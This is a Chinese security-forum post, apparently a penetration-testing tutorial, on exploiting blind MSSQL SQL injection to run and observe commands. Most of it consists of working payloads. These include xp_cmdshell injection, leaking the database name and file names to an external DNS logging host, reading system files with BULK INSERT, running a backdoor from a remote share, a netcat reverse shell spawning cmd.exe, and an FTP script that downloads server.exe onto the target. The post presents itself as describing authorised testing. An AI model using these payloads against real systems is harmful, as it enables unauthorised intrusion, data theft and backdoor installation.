51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 3440|回复: 1
打印 上一主题 下一主题

WEB渗透测试中回显的一些技巧

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2018-5-18 16:10:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在很多场景中,WEB是渗透测试的一个相对容易的入口。通常经过测试授权后,我们会先尝试拿到一个WEB
SEHLL,然后再通过各种方法提权,来控制一台内网机器,然后利用这台内网机器控制整个内部网络。

在进行WEB渗透的时候,我们通常会通过后台弱口令、SQL注入、XSS、任意文件上传等漏洞来进行攻击测试。
在测试的时候我们会根据服务器返回信息来判断漏洞是否存在,也是根据服务器返回的信息来判断我们能否
成功执行命令,能否成功读取服务器上的文件。因此我们在进行渗透测试的时候,能否及时获得服务器相应
的反馈信息尤为重要。本文将通过实际研究,来寻找各种及时获得服务器响应数据的技术、方法,为渗透测
试铺平道路。下面将模拟一个实例来进行研究分析。

假如在渗透测试的时候,我们通过对主域名进行C段扫描,发现了一个子域名,并且该子域名存某处存在sql
注入漏洞,通过测试发现,该注入点支持UNION查询如图:

从返回信息我们能够知道数据库版本,也知道了数据库服务器是 windows 操作系统。但是给服务器发送HTT
P请求后,返回数据包如下:


通过返回的数据,我们判断服务器是LINUX系统。从目前的信息来看,WEB服务器在一台LINUX系统上,然
而它使用的数据库在一台WINDOWS系统上。这样我们就无法直接通过数据库操作来获得一个WEBSHELL了。
接下来我们的思路是想办法来控制这台数据库服务器,从而获得一台内网服务器的权限,然后再去渗透其他
内部服务器。


首先我们对数据库当前用户的权限进行判断:


返回正常信息,由此我们判断数据库当前用户具有系统管理员权限。这个时候本以为简单地用sqlmap跑一下
就直接可以结束工作了。

我们可以看到这个时候sqlmap并没有正常工作,可见sqlmap无法直接对https的连接进行注入。这里有个小
技巧,我们让sqlmap通过代理访问网络就可以达到目的。首先配置好burp让burp可以成功抓取https数据包,
然后用burp作为代理,在执行sqlmap时加上参数 –proxyhttp://127.0.0.1:8080,这样应该就可以了。实际
测试时候发现,sqlmap自带的useragent 导致请求的数据包没有返回信息,因此我们加入了参数—user-agen
t ‘’ ,我们测试如下:


已经可以正常注入了,可以看出支持UNION,支持多行查询。然后我们加个参数—os-shell看看能不能得到一
个命令行下的SHELL


Sqlmap这时候非常不给力,我们执行的命令根本没有返回结果,也可能命令根本并没有执行成功。这时候
只有我们自食其力了。


数据库具有系统管理权限,sqlmap执行os-shell时已经提示了xp_cmdshell恢复成功,我们想到的首先就是通
过xp_cmdshell执行命令。当然我们是无法看到命令执行结果的,我们通过ceye.io申请了一个账户,准备通
过DNS记录来看执行命令成功与否。通过ping 然后查询dns记录来判断命令知否执行成功

https://***/**.php?id=21;EXEC xp_cmdshell 'ping a1.***.ceye.i

很幸运,我们看到了DNS记录的结果


说明可以成功执行命令。然后我们试图想通过数据组件配合DNS记录来获得命令执行情况。在研究过程中,
我们总结了以下方法来进行信息刺探。

1、利用HttpRequestData

DECLARE @returnText VARCHAR(500);DECLARE @status int;DECLARE @urlStr VARCHAR(255);SET @u
rlStr ='http://ddd.***.ceye.io/a';EXEC P_GET_HttpRequestData  @urlStr, @status OUTPUT, @returnT
ext   OUTPUT

2、通过共享路径来执行程序

https://***/**.php?id=21;declare

@@hp varchar(800);set @@hp=db_name(0);exec('exec xp_cmdshell

''\\'%2b@@hp%2b'.***.ceye.io\a.exe''')

//%2b //连接变量的时候最好把+编码,否则传过去会是空格,导致命令不成功;这里执行命令测试时需要
嵌套在外部exec里才能成功到DNS,另外''是两个单引号。

3、数据库备份:

先执行create database rain;然后:

declare @@hp varchar(800);set @@hp = db_name();exec('backup log [rain] to disk=''\\'+@@hp+'. **
*.ceye.io\a.exe'';');-- //+记得编码

4、把命令执行结果保存到变量,再写入数据库,然后查询数据库的信息来查看命令返回结果

create table test(t1 nvarchar(255), id int);DECLARE @result varchar(255);EXEC xp_cmdshell 'ping my
test1.***.ceye.io',@result out

put;insert into test(t1) values(@result);

再查询结果and 1=(select top 1 t1 from test) 或者and 1=(select count(*) from test where t1>1)

5、把文件读入数据库 再查询来看文件

;drop table cmd;create table cmd (a text);BULK INSERT cmd FROM 'c:\boot.ini' WITH (FIELDTERMIN
ATOR = '\n',ROWTERMINATOR ='\n\n')

6、访问共享目录执行后门程序

\\***\web\server.exe

(目前可能只有某些国外VPS才能访问共享目录)

7、利用nc反弹

服务端nc -vv ip 8090 -e c:\windows\system32\cmd.exe

客户端nc -vv -l -p 8090

8、ftp上传、下载文件:

首先有个好用ftp服务器Quick Easy FTP Server V4.0.0 可以记录访问日志

通过ftp open命令可以记录服务器外部IP地址,扫描发现未开放任何端口

最初上传的时候由于没有判断目录是否可写 一直尝试失败

后来意识到目录权限的问题了,然后找了个目录c:\windows\temp\

首先写一个bat ,里面的命令是ping dns 然后执行bat看DNS访问记录  如果成功

接下来:

echo open ***>c:\windows\temp\ftp1.txt

echo x>>c:\windows\temp\ftp1.txt

echo x>>c:\windows\temp\ftp1.txt

echo binary >>c:\windows\temp\ftp1.txt

//下载到指定目录

echo get server.exe c:\windows\temp\server.exe >>c:\windows\temp\ftp1.txt

echo bye >>c:\windows\temp\ftp1.txt

ftp -s:c:\windows\temp\ftp1.txt

del c:\windows\temp\ftp1.txt

通过查看ftp服务器日志 可以判断是否下载成功。

9、利用bat脚本来实现信息刺探


dir /b/a-d/od c:\windows\temp >test.txt  // dir /b/a-d/od 获得目录里的文件名

for /f "delims=:" %%a in (test.txt) do (ping %%a.***.ceye.io) //把文件名发送到DNS记录

本地测试结果如下:

文件名带入了ping请求里了,这时我们看看DNS日志记录:


成功读取到了文件名

实际在命令行写入bat脚本的时候 要注意用^来转义< >符号,%需要编码成%25。


实现脚本如下:

echo dir /b/a-d/od c:\windows\temp ^>test.txt > c:\windows\temp\dir.bat

echo for /f "delims=:" %25%25a in (test.txt) do (ing %25%25a.***.ceye.io) >>c:\windows\temp\dir.bat



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

x
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏3
回复

使用道具 举报

该用户从未签到

2#
发表于 2018-7-30 15:23:29 | 只看该作者
学习了,很棒!
回复 支持 反对

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-24 22:33 , Processed in 0.063025 second(s), 24 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表